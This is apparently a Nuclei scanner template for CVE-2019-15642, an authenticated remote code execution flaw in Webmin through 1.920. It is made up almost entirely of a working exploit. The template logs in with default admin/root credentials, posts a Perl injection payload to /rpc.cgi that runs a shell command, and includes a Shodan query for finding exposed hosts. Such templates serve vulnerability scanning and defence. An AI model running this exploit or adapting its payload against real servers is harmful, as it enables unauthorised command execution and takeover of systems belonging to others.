id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
  metadata:
    max-request: 4
    shodan-query: title:"Webmin"
    verified: true
  tags: cve,cve2019,webmin,rce

variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}
      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root

    stop-at-first-match: true
    host-redirects: true
    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200